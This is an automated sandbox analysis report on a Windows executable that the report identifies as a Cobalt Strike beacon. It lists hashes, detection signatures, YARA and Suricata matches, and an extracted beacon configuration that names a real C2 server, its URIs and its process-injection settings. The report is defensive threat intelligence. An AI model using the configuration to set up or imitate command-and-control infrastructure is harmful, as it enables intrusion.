Edit tour

Windows Analysis Report
31#U544a.exe

Overview

General Information

Sample name:	31#U544a.exe renamed because original name is a hash value
Original sample name:	CEAP.exe
Analysis ID:	1568880
MD5:	7d6748d103f78d1a8ddab5646c5cb1a3
SHA1:	744a3590531665487bf22bc7df7b45663a30790f
SHA256:	8ac3f3a5bd3ba1cb8490cf1c69c364a39feac66ee084cf218f3dd11e9be3ac92
Tags:	backdoorexegenericxor-urluser-zhuzhu0009
Infos:

Detection

CobaltStrike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected CobaltStrike

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

31#U544a.exe (PID: 6260 cmdline: "C:\Users\user\Desktop\31#U544a.exe" MD5: 7D6748D103F78D1A8DDAB5646C5CB1A3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 10203, "SleepTime": 15000, "MaxGetSize": 2798827, "Jitter": 20, "C2Server": "202.175.7.146,/bfs/svg-next/BDC/playdata_square_line/v1.json", "HttpPostUri": "/cgi/video/getVideoRecList", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 1013 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": "Host: 202.175.7.146\r\n"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2905522054.000001912B7A1000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1ce48:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x18eaf:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a1e0:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x18f2f:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a260:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
Process Memory Space: 31#U544a.exe PID: 6260	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Click to see the 6 entries

Suricata Signatures

ET MALWARE Meterpreter or Other Reverse Shell SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T05:29:55.785387+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49917	TCP
2024-12-05T05:30:02.018686+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49731	TCP
2024-12-05T05:30:07.601315+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49733	TCP
2024-12-05T05:30:11.022236+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49734	TCP
2024-12-05T05:30:14.429556+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49735	TCP
2024-12-05T05:30:17.857559+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49738	TCP
2024-12-05T05:30:21.424773+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49742	TCP
2024-12-05T05:30:24.882636+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49744	TCP
2024-12-05T05:30:28.370918+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49745	TCP
2024-12-05T05:30:31.802831+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49746	TCP
2024-12-05T05:30:35.237676+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49747	TCP
2024-12-05T05:30:39.114934+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49748	TCP
2024-12-05T05:30:42.545267+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49749	TCP
2024-12-05T05:30:45.997969+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49750	TCP
2024-12-05T05:30:49.454200+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49751	TCP
2024-12-05T05:30:52.947888+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49752	TCP
2024-12-05T05:30:56.391228+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49753	TCP
2024-12-05T05:30:59.851798+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49756	TCP
2024-12-05T05:31:03.394222+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49767	TCP
2024-12-05T05:31:06.867041+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49773	TCP
2024-12-05T05:31:10.305104+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49784	TCP
2024-12-05T05:31:13.889242+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49790	TCP
2024-12-05T05:31:17.347274+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49800	TCP
2024-12-05T05:31:20.880712+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49809	TCP
2024-12-05T05:31:24.327126+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49817	TCP
2024-12-05T05:31:27.740736+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49828	TCP
2024-12-05T05:31:31.173759+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49834	TCP
2024-12-05T05:31:34.639153+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49845	TCP
2024-12-05T05:31:38.111359+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49852	TCP
2024-12-05T05:31:41.575021+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49862	TCP
2024-12-05T05:31:44.996980+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49873	TCP
2024-12-05T05:31:48.427962+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49879	TCP
2024-12-05T05:31:51.998954+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49890	TCP
2024-12-05T05:31:55.566157+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49897	TCP
2024-12-05T05:31:59.067743+0100	2035651	1	A Network Trojan was detected	202.175.7.146	10203	192.168.2.4	49907	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 31#U544a.exe

Avira: detected

Found malware configuration

Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 10203, "SleepTime": 15000, "MaxGetSize": 2798827, "Jitter": 20, "C2Server": "202.175.7.146,/bfs/svg-next/BDC/playdata_square_line/v1.json", "HttpPostUri": "/cgi/video/getVideoRecList", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 1013 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": "Host: 202.175.7.146\r\n"}

Multi AV Scanner detection for submitted file

Source: 31#U544a.exe	ReversingLabs: Detection: 13%
Source: 31#U544a.exe	Virustotal: Detection: 26%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 31#U544a.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 118.31.219.225:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: 31#U544a.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\31#U544a.exe

Code function: 4x nop then push r12

0_2_00007FF71A85B316

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49748
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49731
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49773
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49747
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49809
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49790
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49784
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49817
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49746
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49828
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49800
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49834
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49845
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49852
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49862
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49873
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49890
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49879
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49897
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49907
Source: Network traffic	Suricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49917

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 202.175.7.146

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 202.175.7.146:10203

Source: global traffic

HTTP traffic detected: GET /update.json HTTP/1.1accept: */*host: leganse.oss-cn-hangzhou.aliyuncs.com

Source: Joe Sandbox View

ASN Name: CTM-MOCompanhiadeTelecomunicacoesdeMacauSARLMO CTM-MOCompanhiadeTelecomunicacoesdeMacauSARLMO

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146
Source: unknown	TCP traffic detected without corresponding DNS query: 202.175.7.146

Source: C:\Users\user\Desktop\31#U544a.exe

Code function: 0_2_00007FF71A84EB09 recv,WSAGetLastError,

0_2_00007FF71A84EB09

Source: global traffic

HTTP traffic detected: GET /update.json HTTP/1.1accept: */*host: leganse.oss-cn-hangzhou.aliyuncs.com

Source: global traffic

DNS traffic detected: DNS query: leganse.oss-cn-hangzhou.aliyuncs.com

Source: 31#U544a.exe, 00000000.00000003.1953586887.000001912B6C5000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B09C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.liveapi.com/
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.liveapi.com/.
Source: 31#U544a.exe, 00000000.00000003.1746035165.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.liveapi.com/d06
Source: 31#U544a.exe, 00000000.00000003.1953841512.000001912B0FB000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000002.2905242341.000001912B6E8000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.liveapi.com/gzip
Source: 31#U544a.exe, 00000000.00000003.1878032408.000001912B106000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.liveapi.com/y
Source: 31#U544a.exe, 00000000.00000003.1690676459.000001912B0B7000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690624284.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690360896.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mZ6/
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 31#U544a.exe, 00000000.00000003.1746035165.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 31#U544a.exe, 00000000.00000002.2905242341.000001912B6BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab.9e#
Source: 31#U544a.exe, 00000000.00000003.1740111790.000001912BED1000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1740158778.000001912BEF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?85050d4d7d887
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B02C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stream.liveapi.com/
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/;q=0.8
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json#y
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json-x
Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json7y
